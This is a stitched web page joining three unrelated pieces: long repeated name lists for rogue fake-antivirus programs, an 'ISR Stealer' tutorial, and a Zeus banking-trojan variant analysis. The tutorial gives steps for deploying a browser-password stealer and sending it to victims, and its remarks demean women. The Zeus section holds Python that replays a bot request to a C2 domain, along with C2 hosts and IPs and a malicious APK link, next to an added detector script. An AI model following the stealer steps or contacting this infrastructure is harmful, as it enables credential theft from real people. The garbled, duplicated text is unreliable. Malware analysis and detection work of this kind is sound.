Release, Windows Safeguard Upgrade, Windows Secure Surfer, Windows Be-on-Guard Edition, Windows Abnormality Checker, Windows Pro Solutions, Windows Sleek Performance, Windows ProSecurity Scanner, Windows Advanced User Patch, Windows Internet Booster, Windows Pro Web Helper, Windows Daily Adviser, Windows Safety Module, Windows High-End Protection, Windows Recovery Series, Windows Safety Checkpoint, Windows Premium Guard, Windows Efficiency Accelerator, Windows Performance Adviser, Windows Pro Rescuer, Windows Safety Toolkit, Windows Antivirus Care, Windows Guard Solutions, Windows Safety Manager, Windows Antivirus Patch, Windows Protection Unit, Windows Crucial Scanner, Windows Foolproof Protector, Windows Antibreaking System, Windows Component Protector, Windows Cleaning Tools, Windows Stability Maximizer, Windows Processes Accelerator, Windows Efficiency Reservoir, Windows Care Taker, Windows Custodian Utility, Windows Shielding Utility, Windows Warding System, Windows Activity Debugger, Windows First-Class Protector, Windows Trouble Taker, Windows Managing System, Windows Defending Center, Windows Debug Center, Windows No-Risk Agent, Windows Software Saver, Windows Antihazard Helper, Windows AntiHazard Center, Windows Process Director, Windows Guardian Angel, Windows Software Keeper, Windows Problems Stopper, Windows Health Keeper, Windows No-Risk Center, Windows Antihazard Solution, Windows Risk Minimizer, Windows Managing System, Windows Safety Tweaker, Windows Tools Patch, Windows Personal Doctor, Windows Personal Detective, Windows Trojans Sleuth, Windows Malware Sleuth, Windows Trojans Inspector, Windows Attacks Defender, Windows Attacks Preventor, Windows Threats Destroyer, Windows Firewall Constructor, Windows Stability Guard, Windows Basic Antivirus, Windows PRO Scanner, Windows Shield Tool, Windows Telemetry Center, Windows Performance Catalyst, Windows Smart Partner, Windows Smart Warden, Windows Functionality Checker, Windows Protection Master

To register (and help removal), copy and paste this code: 0W000-000B0-00T00-E0021

ISR STEALER Tutorial

ISR STEALER - STEAL PASSWORDS BY JUST SITTING AT HOME

HACK BROWSER SAVED PASSWORDS ----------

Guys, this is a very interesting tutorial on HOW TO HACK THE BROWSER SAVED PASSWORDS. Actually this tutorial is mostly for GIRLS who save their passwords in the browser huhhh GIRLS r just GIRLS LOLZ..... So, not to waste time, let's begin with our tutorial:
Download the requirements:
ISR stealer 0.4.1

Note: this is a stealer, so you will need to turn off your antivirus. Use at your own risk!

Step 1. Log in to your account on 000webhost.com and go to the cPanel.

Step 2. Go to the MySQL database.

Step 3. Create a database.

Step 4. Fill in the database info in the config.php file.




Step 5. Set the username and password for the shell account...

Step 6. Create the .zip file of all the php files...

Step 7. Upload the php.zip to 000webhost...

Step 8. Then open the URL of the 000webhost site with /install.php appended.

Step 9. Click on the install icon...

Step 10. After successfully installing the files, delete install.php from public_html...

Step 11. Copy the URL link and go to the ISR folder.

Step 12. Click on ISR and paste the URL of 000/index.php

Step 13. Click on "test php"... it shows Done, check ur logs..

Step 14. Now build the server... it will create the server.....

Step 15. Bind the server with any file and send it to the victim.....

Now, to check the logs, just log in to your account. PROOF OF MY PROGRESS:

ACTUALLY THERE ARE NO PASSWORDS IN MY BROWSER SO I AM SAVED, BUT I PROMISE YOU GUYS THAT IF YOU STORE PASSWORDS IN YOUR BROWSERS YOU CAN BE HACKED IN A MINUTE.......

THANX FOR YOUR SUPPORT GUYS

Windows Security Master

Windows Security Master is a fake Antivirus. This rogue displays fake alerts to scare users. It replaces Windows Defence Unit, Windows Protection Booster, Windows AntiVirus Booster, Windows AntiVirus Helper, Windows AntiVirus Tool, Windows Antivirus Suite, Windows AntiBreach Helper, Windows AntiBreach Suite, Windows AntiBreach Tool, Windows Paramount Protection, Windows Antivirus Master, Windows Safety Master, Windows Ultimate Booster, Windows Efficiency Kit, Windows Prime Accelerator, Windows Prime Shield, Windows Prime Booster, Windows Virtual Protector, Windows Accelerator Pro, Windows Premium Shield, Windows Efficiency Console, Windows Activity Booster, Windows Warding Module, Windows Active HotSpot, Windows Cleaning Toolkit, Windows Expert Console, Windows Safety Series, Windows Secure Workstation, Windows Anti-Malware Patch, Windows Virtual Security, Windows Antivirus Release, Windows Interactive Safety, Windows Ultimate Safeguard, Windows Antivirus Machine, Windows Active Guard, Windows Security Renewal, Windows Home Patron, Windows Virtual Firewall, Windows Premium Defender, Windows Web Combat, Windows Virtual Angel, Windows Profound Security, Windows Expert Series, Windows Virus Hunter, Windows Web Commander, Windows Interactive Security, Windows Proprietary Advisor, Windows Privacy Extension, Windows Custom Management, Windows Pro Defence, Windows Control Series, Windows Advanced Toolkit, Windows Proactive Safety, Windows Maintenance Guard, Windows Secure Web Patch, Windows Active Defender, Windows Instant Scanner, Windows Privacy Counsel, Windows Custom Safety, Windows Privacy Module, Windows Maintenance Suite, Windows PC Aid, Windows Safety Wizard, Windows TurnKey Console, Windows Malware Firewall, Windows Antivirus Rampart, Windows Ultimate Security Patch, Windows Defence Counsel, Windows Guard Tools, Windows Safety Maintenance, Windows Multi Control System, Windows Pro Safety, Windows Private Shield, Windows Pro Safety Release, Windows Safeguard 
Upgrade, Windows Secure Surfer, Windows Be-on-Guard Edition, Windows Abnormality Checker, Windows Pro Solutions, Windows Sleek Performance, Windows ProSecurity Scanner, Windows Advanced User Patch, Windows Internet Booster, Windows Pro Web Helper, Windows Daily Adviser, Windows Safety Module, Windows High-End Protection, Windows Recovery Series, Windows Safety Checkpoint, Windows Premium Guard, Windows Efficiency Accelerator, Windows Performance Adviser, Windows Pro Rescuer, Windows Safety Toolkit, Windows Antivirus Care, Windows Guard Solutions, Windows Safety Manager, Windows Antivirus Patch, Windows Protection Unit, Windows Crucial Scanner, Windows Foolproof Protector, Windows Antibreaking System, Windows Component Protector, Windows Cleaning Tools, Windows Stability Maximizer, Windows Processes Accelerator, Windows Efficiency Reservoir, Windows Care Taker, Windows Custodian Utility, Windows Shielding Utility, Windows Warding System, Windows Activity Debugger, Windows First-Class Protector, Windows Trouble Taker, Windows Managing System, Windows Defending Center, Windows Debug Center, Windows No-Risk Agent, Windows Software Saver, Windows Antihazard Helper, Windows AntiHazard Center, Windows Process Director, Windows Guardian Angel, Windows Software Keeper, Windows Problems Stopper, Windows Health Keeper, Windows No-Risk Center, Windows Antihazard Solution, Windows Risk Minimizer, Windows Managing System, Windows Safety Tweaker, Windows Tools Patch, Windows Personal Doctor, Windows Personal Detective, Windows Trojans Sleuth, Windows Malware Sleuth, Windows Trojans Inspector, Windows Attacks Defender, Windows Attacks Preventor, Windows Threats Destroyer, Windows Firewall Constructor, Windows Stability Guard, Windows Basic Antivirus, Windows PRO Scanner, Windows Shield Tool, Windows Telemetry Center, Windows Performance Catalyst, Windows Smart Partner, Windows Smart Warden, Windows Functionality Checker, Windows Protection Master

To register (and help removal), copy and paste this code: 0W000-000B0-00T00-E0021

Windows Defence Unit

Windows Defence Unit is a fake Antivirus. This rogue displays fake alerts to scare users. It replaces Windows Protection Booster, Windows AntiVirus Booster, Windows AntiVirus Helper, Windows AntiVirus Tool, Windows Antivirus Suite, Windows AntiBreach Helper, Windows AntiBreach Suite, Windows AntiBreach Tool, Windows Paramount Protection, Windows Antivirus Master, Windows Safety Master, Windows Ultimate Booster, Windows Efficiency Kit, Windows Prime Accelerator, Windows Prime Shield, Windows Prime Booster, Windows Virtual Protector, Windows Accelerator Pro, Windows Premium Shield, Windows Efficiency Console, Windows Activity Booster, Windows Warding Module, Windows Active HotSpot, Windows Cleaning Toolkit, Windows Expert Console, Windows Safety Series, Windows Secure Workstation, Windows Anti-Malware Patch, Windows Virtual Security, Windows Antivirus Release, Windows Interactive Safety, Windows Ultimate Safeguard, Windows Antivirus Machine, Windows Active Guard, Windows Security Renewal, Windows Home Patron, Windows Virtual Firewall, Windows Premium Defender, Windows Web Combat, Windows Virtual Angel, Windows Profound Security, Windows Expert Series, Windows Virus Hunter, Windows Web Commander, Windows Interactive Security, Windows Proprietary Advisor, Windows Privacy Extension, Windows Custom Management, Windows Pro Defence, Windows Control Series, Windows Advanced Toolkit, Windows Proactive Safety, Windows Maintenance Guard, Windows Secure Web Patch, Windows Active Defender, Windows Instant Scanner, Windows Privacy Counsel, Windows Custom Safety, Windows Privacy Module, Windows Maintenance Suite, Windows PC Aid, Windows Safety Wizard, Windows TurnKey Console, Windows Malware Firewall, Windows Antivirus Rampart, Windows Ultimate Security Patch, Windows Defence Counsel, Windows Guard Tools, Windows Safety Maintenance, Windows Multi Control System, Windows Pro Safety, Windows Private Shield, Windows Pro Safety Release, Windows Safeguard Upgrade, Windows Secure 
Surfer, Windows Be-on-Guard Edition, Windows Abnormality Checker, Windows Pro Solutions, Windows Sleek Performance, Windows ProSecurity Scanner, Windows Advanced User Patch, Windows Internet Booster, Windows Pro Web Helper, Windows Daily Adviser, Windows Safety Module, Windows High-End Protection, Windows Recovery Series, Windows Safety Checkpoint, Windows Premium Guard, Windows Efficiency Accelerator, Windows Performance Adviser, Windows Pro Rescuer, Windows Safety Toolkit, Windows Antivirus Care, Windows Guard Solutions, Windows Safety Manager, Windows Antivirus Patch, Windows Protection Unit, Windows Crucial Scanner, Windows Foolproof Protector, Windows Antibreaking System, Windows Component Protector, Windows Cleaning Tools, Windows Stability Maximizer, Windows Processes Accelerator, Windows Efficiency Reservoir, Windows Care Taker, Windows Custodian Utility, Windows Shielding Utility, Windows Warding System, Windows Activity Debugger, Windows First-Class Protector, Windows Trouble Taker, Windows Managing System, Windows Defending Center, Windows Debug Center, Windows No-Risk Agent, Windows Software Saver, Windows Antihazard Helper, Windows AntiHazard Center, Windows Process Director, Windows Guardian Angel, Windows Software Keeper, Windows Problems Stopper, Windows Health Keeper, Windows No-Risk Center, Windows Antihazard Solution, Windows Risk Minimizer, Windows Managing System, Windows Safety Tweaker, Windows Tools Patch, Windows Personal Doctor, Windows Personal Detective, Windows Trojans Sleuth, Windows Malware Sleuth, Windows Trojans Inspector, Windows Attacks Defender, Windows Attacks Preventor, Windows Threats Destroyer, Windows Firewall Constructor, Windows Stability Guard, Windows Basic Antivirus, Windows PRO Scanner, Windows Shield Tool, Windows Telemetry Center, Windows Performance Catalyst, Windows Smart Partner, Windows Smart Warden, Windows Functionality Checker, Windows Protection Master

To register (and help removal), copy and paste this code: 0W000-000B0-00T00-E0021

Windows Protection Booster

Windows Protection Booster is a fake Antivirus. This rogue displays fake alerts to scare users. It replaces Windows AntiVirus Booster, Windows AntiVirus Helper, Windows AntiVirus Tool, Windows Antivirus Suite, Windows AntiBreach Helper, Windows AntiBreach Suite, Windows AntiBreach Tool, Windows Paramount Protection, Windows Antivirus Master, Windows Safety Master, Windows Ultimate Booster, Windows Efficiency Kit, Windows Prime Accelerator, Windows Prime Shield, Windows Prime Booster, Windows Virtual Protector, Windows Accelerator Pro, Windows Premium Shield, Windows Efficiency Console, Windows Activity Booster, Windows Warding Module, Windows Active HotSpot, Windows Cleaning Toolkit, Windows Expert Console, Windows Safety Series, Windows Secure Workstation, Windows Anti-Malware Patch, Windows Virtual Security, Windows Antivirus Release, Windows Interactive Safety, Windows Ultimate Safeguard, Windows Antivirus Machine, Windows Active Guard, Windows Security Renewal, Windows Home Patron, Windows Virtual Firewall, Windows Premium Defender, Windows Web Combat, Windows Virtual Angel, Windows Profound Security, Windows Expert Series, Windows Virus Hunter, Windows Web Commander, Windows Interactive Security, Windows Proprietary Advisor, Windows Privacy Extension, Windows Custom Management, Windows Pro Defence, Windows Control Series, Windows Advanced Toolkit, Windows Proactive Safety, Windows Maintenance Guard, Windows Secure Web Patch, Windows Active Defender, Windows Instant Scanner, Windows Privacy Counsel, Windows Custom Safety, Windows Privacy Module, Windows Maintenance Suite, Windows PC Aid, Windows Safety Wizard, Windows TurnKey Console, Windows Malware Firewall, Windows Antivirus Rampart, Windows Ultimate Security Patch, Windows Defence Counsel, Windows Guard Tools, Windows Safety Maintenance, Windows Multi Control System, Windows Pro Safety, Windows Private Shield, Windows Pro Safety Release, Windows Safeguard Upgrade, Windows Secure Surfer, Windows Be-on-Guard 
Edition, Windows Abnormality Checker, Windows Pro Solutions, Windows Sleek Performance, Windows ProSecurity Scanner, Windows Advanced User Patch, Windows Internet Booster, Windows Pro Web Helper, Windows Daily Adviser, Windows Safety Module, Windows High-End Protection, Windows Recovery Series, Windows Safety Checkpoint, Windows Premium Guard, Windows Efficiency Accelerator, Windows Performance Adviser, Windows Pro Rescuer, Windows Safety Toolkit, Windows Antivirus Care, Windows Guard Solutions, Windows Safety Manager, Windows Antivirus Patch, Windows Protection Unit, Windows Crucial Scanner, Windows Foolproof Protector, Windows Antibreaking System, Windows Component Protector, Windows Cleaning Tools, Windows Stability Maximizer, Windows Processes Accelerator, Windows Efficiency Reservoir, Windows Care Taker, Windows Custodian Utility, Windows Shielding Utility, Windows Warding System, Windows Activity Debugger, Windows First-Class Protector, Windows Trouble Taker, Windows Managing System, Windows Defending Center, Windows Debug Center, Windows No-Risk Agent, Windows Software Saver, Windows Antihazard Helper, Windows AntiHazard Center, Windows Process Director, Windows Guardian Angel, Windows Software Keeper, Windows Problems Stopper, Windows Health Keeper, Windows No-Risk Center, Windows Antihazard Solution, Windows Risk Minimizer, Windows Managing System, Windows Safety Tweaker, Windows Tools Patch, Windows Personal Doctor, Windows Personal Detective, Windows Trojans Sleuth, Windows Malware Sleuth, Windows Trojans Inspector, Windows Attacks Defender, Windows Attacks Preventor, Windows Threats Destroyer, Windows Firewall Constructor, Windows Stability Guard, Windows Basic Antivirus, Windows PRO Scanner, Windows Shield Tool, Windows Telemetry Center, Windows Performance Catalyst, Windows Smart Partner, Windows Smart Warden, Windows Functionality Checker, Windows Protection Master

To register (and help removal), copy and paste this code: 0W000-000B0-00T00-E0021

Zeus 1.1.3.4

RSA FirstWatch recently threw me a sample of a 'new' Zeus variant.
I didn't really check all the changes that were made, but it seems to be nothing more than a standard Zeus v2.
But wait: it communicates over SSL and has a new kind of HTTP request pattern:

Fiddler:

Config download in Python (Python 2, urllib2), replaying the request pattern seen in Fiddler:
import urllib2

# Build the same request the bot sends: the ?ajax query plus the custom X_* headers
request = urllib2.Request('https://secureinformat.com/?ajax')
request.add_header('Accept', '*/*')
request.add_header('X_ID', '14E255CE7875768FBC303C10')   # bot ID
request.add_header('X_OS', '510')                        # OS version
request.add_header('X_BV', '1.1.3.4')                    # variant version
request.add_header('Control', 'no-cache')                # sent as 'Control', not 'Cache-Control', in the capture
request.add_header('User-Agent', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729;')
page = urllib2.urlopen(request).read()
# The config is a binary blob: write it in binary mode so nothing is altered on Windows
open('ajax', 'wb').write(page)

Notice the new headers:
X_ID = Bot ID
X_OS = OS version
X_BV = Variant version

The server's response sets X_ID as a cookie:
<< HTTP/1.1 200 OK
<< Date: Fri, 28 Feb 2014 06:35:34 GMT
<< Server: Apache
<< Set-Cookie: X_ID=14E255CE7875768FBC303C10; expires=Sat, 28-Feb-2015 06:35:34 GMT; path=/
<< Content-Description: File Transfer
<< Content-Disposition: attachment; filename=ajax
<< Content-Transfer-Encoding: binary
<< Expires: 0
<< Cache-Control: must-revalidate, post-check=0, pre-check=0
<< Pragma: public
<< Content-Length: 3685
<< Connection: close
<< Content-Type: application/octet-stream
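Added example (not part of the original post): a small detector for the beacon shape described above, run over constructed request and response samples. The header names, the X_ID value and the hostname are taken from the capture above; the benign request and the alerting rule (require the full X_ID/X_OS/X_BV triple) are my own assumptions.

```python
import re

# Constructed sample traffic (not captured from the original post's sample):
# a beacon shaped like the request above, a benign request, and the C2 reply.
ZEUS_REQUEST = (
    "GET /?ajax HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "X_ID: 14E255CE7875768FBC303C10\r\n"
    "X_OS: 510\r\n"
    "X_BV: 1.1.3.4\r\n"
    "Control: no-cache\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;\r\n"
    "Host: secureinformat.com\r\n"
    "\r\n"
)
BENIGN_REQUEST = (
    "GET /?ajax HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "Cache-Control: no-cache\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Host: www.example.com\r\n"
    "\r\n"
)
ZEUS_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache\r\n"
    "Set-Cookie: X_ID=14E255CE7875768FBC303C10; expires=Sat, 28-Feb-2015 06:35:34 GMT; path=/\r\n"
    "Content-Disposition: attachment; filename=ajax\r\n"
    "Content-Type: application/octet-stream\r\n"
    "\r\n"
)

BOT_ID_RE = re.compile(r"^[0-9A-F]{24}$")         # 24 upper-case hex digits, as in the capture
VARIANT_RE = re.compile(r"^\d+\.\d+\.\d+\.\d+$")  # four-part version such as 1.1.3.4 / 1.1.2.1


def parse_http(raw):
    """Split a raw HTTP message into its start line and a dict of lower-cased headers.
    A single Set-Cookie is enough here; real traffic may carry several."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def zeus_indicators(raw_request):
    """Return the list of Zeus 1.1.3.4 traits found in one request (empty = nothing seen)."""
    start, h = parse_http(raw_request)
    found = []
    if "x_id" in h and BOT_ID_RE.match(h["x_id"]):
        found.append("x_id")
    if "x_os" in h and h["x_os"].isdigit():
        found.append("x_os")
    if "x_bv" in h and VARIANT_RE.match(h["x_bv"]):
        found.append("x_bv")
    if "control" in h and "cache-control" not in h:  # bare 'Control' instead of Cache-Control
        found.append("control_header")
    parts = start.split(" ")
    if len(parts) > 1 and parts[1].endswith("?ajax"):
        found.append("ajax_path")
    return found


def is_zeus_beacon(raw_request):
    """Alert only when the full X_ID/X_OS/X_BV triple is present; '?ajax' alone is far too common."""
    return {"x_id", "x_os", "x_bv"}.issubset(zeus_indicators(raw_request))


def response_echoes_bot_id(raw_request, raw_response):
    """True if the server set an X_ID cookie equal to the bot ID the client sent."""
    _, req = parse_http(raw_request)
    _, resp = parse_http(raw_response)
    m = re.match(r"X_ID=([0-9A-F]+)", resp.get("set-cookie", ""))
    return bool(m) and m.group(1) == req.get("x_id")
```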

Sample: bb9fe8c3df598b8b6ea2f2653c38ecd2
Version: 1.1.3.4
Drop Point: http://localhost/gate.php
Infection Point: http://localhost/bot.exe
Update Point:
http://secureinformat.com/?ajax (static config)

For unpacking the config, again nothing new: regular Zeus v2.
Once unpacked, we can see that the malware is targeting German banks and Trusteer.

Man in the browser:

Clean browser surfing Trusteer website:

Infected browser surfing Trusteer website:
Requesting the user to download an APK:
Test done on the latest Firefox version (v27.0.1)

bit.ly/1jmQHmA = hxtp://shlyxiest.biz/cdn/Trusteer-Mobile.apk
>> https://www.virustotal.com/en/file/2f82ce7288137c0acbeefd9ef9f63926057871611703e77803b842201009767a/analysis/1393786189/
Phone number:  79670478968

Identified as Perkel.c by Kaspersky, Perkel is an Android malware that was sold by Perkele (who was later banned from underground forums for scamming, but that is another story).

Sort of Fake AV:

Sample: 917df7b6268ba705b192b89a1cf28764
Version: 1.1.3.4
Drop Point: http://localhost/gate.php
Infection Point: http://localhost/bot.exe
Update Points:
https://koloboktv.com/?ajax (static config)
https://securestakan2.net/?ajax (dynamic config)
https://securemagnit5.net/?ajax (dynamic config)

Sample: 7fb62987f20b002475cb1499eb86a1f5
Version: 1.1.2.1
Update Point:
https://securestatic.com/?ajax (static config)

All these samples use the same IP range:
• 37.228.92.170 - SECURE730.COM
• 37.228.92.169 - SECUREINFORMAT.COM
• 37.228.92.148 - SHLYXIEST.BIZ
• 37.228.92.147 - SECURESTATIC.COM
• 37.228.92.146 - KOLOBOKTV.COM

I have written a small Yara rule in the hope of seeing more of these.
All the configs I grabbed were reporting to localhost, not to a server...